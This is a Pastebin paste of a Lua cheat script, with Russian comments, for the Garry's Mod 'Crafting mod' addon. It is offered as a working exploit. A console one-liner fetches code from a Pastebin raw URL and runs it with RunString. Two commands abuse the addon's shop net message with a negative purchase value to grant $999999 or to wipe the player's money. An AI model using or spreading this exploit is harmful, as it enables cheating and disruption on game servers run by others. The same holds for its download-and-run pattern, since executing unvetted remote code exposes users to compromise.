CREONIX

EXPLOIT | MONEY | Crafting mod

Oct 8th, 2017
541
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.79 KB | None | 0 0
  1. /*
  2.  
  3. Консоль команда -
  4.  
  5. lua_run_cl http.Fetch( "https://pastebin.com/raw/Jd3NnzYJ",function(body) RunString(body) end)
  6.  
  7.  
  8. Команды :
  9.  
  10. exploit_money - Добавляет $999999
  11.  
  12. exploit_money_clear - Обнуляет деньги
  13.  
  14. Сам аддон :
  15. https://www.gmodstore.com/scripts/view/2422
  16.  
  17. */
  18.  
  19. concommand.Add( "exploit_money", function()
  20.  
  21. net.Start("CRAFTINGMOD_SHOP")
  22.  
  23. net.WriteTable({
  24.  
  25.     BUY =   -999999; -- Пропишешь сколько нужно
  26.  
  27.     type    =   1
  28.  
  29. })
  30.  
  31. net.WriteInt(1,16)
  32.  
  33. net.SendToServer()
  34.  
  35. end)
  36.  
  37. concommand.Add( "exploit_money_clear", function(ply,cmd,args)
  38.  
  39. net.Start("CRAFTINGMOD_SHOP")
  40.  
  41. net.WriteTable({
  42.  
  43.     BUY =   LocalPlayer():getDarkRPVar("money");
  44.  
  45.     type    =   1
  46.  
  47. })
  48.  
  49. net.WriteInt(1,16)
  50.  
  51. net.SendToServer()
  52.  
  53. end)
Add Comment
Please, Sign In to add comment